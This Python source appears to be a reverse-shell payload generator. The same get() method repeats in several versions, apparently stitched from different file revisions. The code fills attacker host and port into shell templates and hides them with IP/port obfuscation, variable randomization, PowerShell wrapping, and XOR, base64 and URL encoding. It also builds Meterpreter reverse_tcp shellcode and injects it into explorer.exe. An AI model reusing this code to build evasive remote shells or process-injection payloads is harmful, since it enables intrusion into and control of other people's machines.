def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Obfuscate IP and port if set in args
if self.args.ipfuscate:
self.port = obfuscate_port(self.port, self.args.obfuscate_small,
self.lang)
# Set connection data to the code.
self.code = self.code.replace("PORT", str(self.port))
# Apply variable randomization
self.code = randomize_vars(self.code, self.args.obfuscate_small,
self.lang)
# Apply powershell-tuning if set in args.
self.code = powershell_wrapper(self.name, self.code, self.args)
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(
self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply url-encoding
if self.args.urlencode is True:
self.code = to_urlencode(self.code)
return self.code
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Update of 0.3.6
# Some custom shells will not need TARGET and PORT strings.
# To deal with that, I will just try to find them in the string first.
if "TARGET" in self.code and "PORT" in self.code:
self.code = str(self.code.replace("TARGET", self.host)).replace(
"PORT", str(self.port))
# Apply powershell-tuning if set in args.
self.code = powershell_wrapper(self.name, self.code, self.args)
else:
# Custom shell. Here we need to program individually based in specifics.
if "bloodseeker" in self.name.lower(
): # This is for Bloodseeker project.
# This one requires a stager.
if self.args.stager is None:
print(error("This payload REQUIRES --stager flag."))
exit(1)
print(info("Generating shellcode ..."))
malicious_script = str(
WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
"SHELLCODEHERE",
shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
self.args.host, self.args.port))
self.code = malicious_script.replace(
"PROCESSNAME",
"explorer") # we want inject into explorer.exe
print(
alert(
"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine."
))
return self.code # we dont need encoder in this one.
else:
print(
error(
"No custom shell procedure was arranged for this shell. This is fatal."
))
exit(1)
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(
self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply URL-encoding
if self.args.urlencode is True and self.args.stager is None:
self.code = to_urlencode(self.code)
return self.code
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Apply base64 encoding.
self.payload = base64_wrapper(self.name, self.payload, self.args)
# Apply URL-encoding
if self.args.urlencode is True:
self.payload = to_urlencode(self.payload)
return self.payload
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Update of 0.3.6
# Some custom shells will not need TARGET and PORT strings.
# To deal with that, I will just try to find them in the string first.
if "TARGET" in self.code and "PORT" in self.code:
self.code = str(self.code.replace("TARGET", self.host)).replace("PORT", str(self.port))
# Apply powershell-tuning if set in args.
self.code = powershell_wrapper(self.name, self.code, self.args)
else:
# Custom shell. Here we need to program individually based in specifics.
# TODO: I need to separate this into a custom file.
if "bat2meterpreter" in self.name.lower():
print(info("Generating shellcode ..."))
return self.code + shellcode_to_hex("windows/meterpreter/reverse_tcp", self.args.host, self.args.port)
if "bloodseeker" in self.name.lower(): # This is for Bloodseeker project.
# This one requires a stager.
if self.args.stager is None:
print(error("This payload REQUIRES --stager flag."))
exit(1)
print(info("Generating shellcode ..."))
malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace("SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port))
# TODO: Create a --bloodseeker-process flag to specify process name
process_name = "explorer"
self.code = malicious_script.replace("PROCESSNAME", process_name)
print(alert("Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \
in your machine."))
return self.code # we don't need encoder in this one.
else:
print(error("No custom shell procedure was arranged for this shell. This is fatal."))
exit(1)
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply URL-encoding
if self.args.urlencode is True and self.args.stager is None:
self.code = to_urlencode(self.code)
return self.code
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Apply base64 encoding.
self.payload = base64_wrapper(self.name, self.payload, self.args)
# Apply URL-encoding
if self.args.urlencode is True:
self.payload = to_urlencode(self.payload)
return self.payload
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
self.code = self.code.replace("PORT", str(self.port))
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(
self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply url-encoding
if self.args.urlencode is True:
self.code = to_urlencode(self.code)
return self.code
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Set connection data to the code.
self.code = self.code.replace("PORT", str(self.port))
# Apply powershell-tuning if set in args.
self.code = powershell_wrapper(self.name, self.code, self.args)
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply url-encoding
if self.args.urlencode is True:
self.code = to_urlencode(self.code)
return self.code
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Set connection data to the code.
self.code = self.code.replace("PORT", str(self.port))
# Apply powershell-tuning if set in args.
self.code = powershell_wrapper(self.name, self.code, self.args)
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(
self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply url-encoding
if self.args.urlencode is True:
self.code = to_urlencode(self.code)
return self.code
def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
# Obfuscate IP and port if set in args
if self.args.ipfuscate and self.lang != "powershell": # Windows shells doesn't support ipfuscation
self.host = ipfuscate(self.host, self.args.obfuscate_small)
self.port = obfuscate_port(self.port, self.args.obfuscate_small,
self.lang)
# Update of 0.3.6
# Some custom shells will not need TARGET and PORT strings.
# To deal with that, I will just try to find them in the string first.
if "TARGET" in self.code and "PORT" in self.code:
self.code = str(self.code.replace("TARGET", self.host)).replace(
"PORT", str(self.port))
# Apply variable randomization
self.code = randomize_vars(self.code, self.args.obfuscate_small,
self.lang)
# Apply powershell-tuning if set in args.
self.code = powershell_wrapper(self.name, self.code, self.args)
else:
# Custom shell. Here we need to program individually based in specifics.
# TODO: I need to separate this into a custom file.
if "bat2meterpreter" in self.name.lower():
print(info("Generating shellcode ..."))
return self.code + shellcode_to_hex(
"windows/meterpreter/reverse_tcp", self.args.host,
self.args.port)
if "bloodseeker" in self.name.lower(
): # This is for Bloodseeker project.
# This one requires a stager.
if self.args.stager is None:
print(error("This payload REQUIRES --stager flag."))
exit(1)
print(info("Generating shellcode ..."))
malicious_script = str(
WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
"SHELLCODEHERE",
shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
self.args.host, self.args.port))
# TODO: Create a --bloodseeker-process flag to specify process name
process_name = "explorer"
self.code = malicious_script.replace("PROCESSNAME",
process_name)
print(
alert(
"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \
in your machine."))
return self.code # we don't need encoder in this one.
else:
print(
error(
"No custom shell procedure was arranged for this shell. This is fatal."
))
exit(1)
# Apply xor encoding.
self.code = self.code if self.args.xor is 0 else xor_wrapper(
self.name, self.code, self.args)
# Apply base64 encoding.
self.code = base64_wrapper(self.name, self.code, self.args)
# Apply URL-encoding
if self.args.urlencode is True and self.args.stager is None:
self.code = to_urlencode(self.code)
return self.code